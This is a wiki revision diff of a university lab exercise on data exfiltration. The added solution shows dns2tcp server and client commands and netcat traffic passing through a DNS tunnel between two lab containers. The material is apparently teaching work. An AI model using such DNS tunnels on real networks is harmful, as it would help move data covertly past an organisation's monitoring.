Differences

This shows you the differences between two versions of the page.

Link to this comparison view

cdci:labs:6 [2020/03/17 01:40]
mihai.chiroiu [07. [20p] DNS exfiltration]
cdci:labs:6 [2024/05/10 14:22] (current)
mihai.chiroiu [01. [5p] Virtual machine setup]
Line 1: Line 1:
 ====== Lab06. Data exfiltration ​ ====== ====== Lab06. Data exfiltration ​ ======
 +
 +<note warning>
 +Important read to be graded!
 +{{page>:​cdci:​rec&​nofooter&​noeditbutton&​noheader}}
 +</​note>​
  
 ===== Objectives ===== ===== Objectives =====
Line 22: Line 27:
 git clone -b labs --single-branch https://​github.com/​mihai-chiroiu/​cdci.git git clone -b labs --single-branch https://​github.com/​mihai-chiroiu/​cdci.git
 git config user.email "​student@upb.ro"​ git config user.email "​student@upb.ro"​
 +</​code>​
 +
 +Now we need to build some docker containers
 +<​code>​
 +root@cdci:/#​ cd cdci/​containers/​exfiltration_lab06/​
 +root@cdci:/#​ make
 </​code>​ </​code>​
  
Line 193: Line 204:
 ==== 07. [20p] DNS exfiltration ==== ==== 07. [20p] DNS exfiltration ====
  
-For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is dns2tcp. Use the following configuration for the client/​server side.+For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://​www.linuxcertif.com/​man/​1/​dns2tcpc/​|dns2tcp]]. Use the following configuration for the client/​server side.
   * Client side configuration   * Client side configuration
 <​code>​ <​code>​
Line 219: Line 230:
 <​solution>​ <​solution>​
 <​code>​ <​code>​
 +root@h2:/# dns2tcpd -f .dns2tcpdrc ​
 +root@h2:/# netstat -nlup
 +Active Internet connections (only servers)
 +Proto Recv-Q Send-Q Local Address ​          ​Foreign Address ​        ​State ​      ​PID/​Program name    ​
 +udp        0      0 0.0.0.0:​53 ​             0.0.0.0:​* ​                          ​428/​dns2tcpd ​          
 +root@h2:/# nc -l -p 8080 -k
 +TEST
 +
 +root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 &
 +[2] 196
 +root@h1:/# Listening on port : 8080
 +root@h1:/# netstat -nltp
 +Active Internet connections (only servers)
 +Proto Recv-Q Send-Q Local Address ​          ​Foreign Address ​        ​State ​      ​PID/​Program name    ​
 +tcp        0      0 127.0.0.1:​8080 ​         0.0.0.0:​* ​              ​LISTEN ​     196/​dns2tcpc ​  
 +root@h1:/# nc 127.0.0.1 8080
 +TEST
 +^C
 </​code>​ </​code>​
 </​solution>​ </​solution>​
cdci/labs/6.txt · Last modified: 2024/05/10 14:22 by mihai.chiroiu
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0